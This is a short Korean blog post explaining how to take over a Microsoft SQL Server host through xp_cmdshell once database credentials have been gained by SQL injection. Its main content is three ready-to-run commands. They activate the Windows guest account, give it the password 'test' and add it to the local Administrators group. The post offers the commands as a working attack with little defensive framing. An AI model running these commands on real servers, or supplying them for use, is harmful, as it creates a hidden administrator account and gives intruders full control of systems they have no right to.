티스토리 뷰
| xp_cmdshell 이용한 서버 해킹 방법 |
MsSql의 보안에 가장 큰 문제가 바로 xp_cmdshell을 이용한 injection
해킹입니다. 아래 예는 injection 해킹을 통해 데이타베이스 접속 권한을
가지고 있는 계정의 암호를 알아내었다는, 가정하에 일어 날수 있는 서버
해킹의 방법을 기술한 것입니다.
순서는 서버상의 guest 계정을 활성화 시키고, 암호를 등록 시킨후
administrators 그룹에 포함시켜 권한을 관리자와 동등하게 만들어주는
시나리오입니다.
|
|
1. xp_cmdshell을 이용한 guest계정 활성
EXEC xp_cmdshell 'net user guest /active:yes'
2. guest 계정 암호 변경
EXEC xp_cmdshell 'net user guest test'
3. 관리자 그룹에 guest계정 추가
EXEC xp_cmdshell 'net localgroup Administrators guest /add'
'프로그램 > MsSql' 카테고리의 다른 글
| Mssql 버전 확인 방법 (0) | 2012.08.29 |
|---|---|
| xp_cmdshell 활성화 (0) | 2012.08.29 |
| MsSql 달력 주차 기준 ISO 8601 (Calendar) (1) | 2012.08.28 |
| SQL2008이상 사용가능한 ISO주차 (0) | 2012.08.28 |
| MsSql xp_cmdshell 해제,삭제,복원 방법 (0) | 2012.08.28 |
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
- Total
- Today
- Yesterday
링크
TAG
- 티스토리 초대
- 대구 카페 추천
- 초대장
- 울산 예쁜 카페
- 운정신도시
- 삼척 추천 여행지
- 장현 카페
- 안드로이드
- 울산 카페
- PowerBuilder
- 파워빌더
- 리스트뷰
- 울산 맛집
- 울산 북구 맛집
- 우리동네 카페
- 태그를 입력해 주세요.
- 장현동 카페
- MSsql
- 울산 카페 추천
- 울산 추천 카페
- 트리거
- 센서
- 간절곶 맛집
- 안드로이드 강좌
- 티스토리 초대장
- 울산 중구 카페
- 삼척 추천여행지
- 맛집
- trigger
- 티스토리초대장
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 |
글 보관함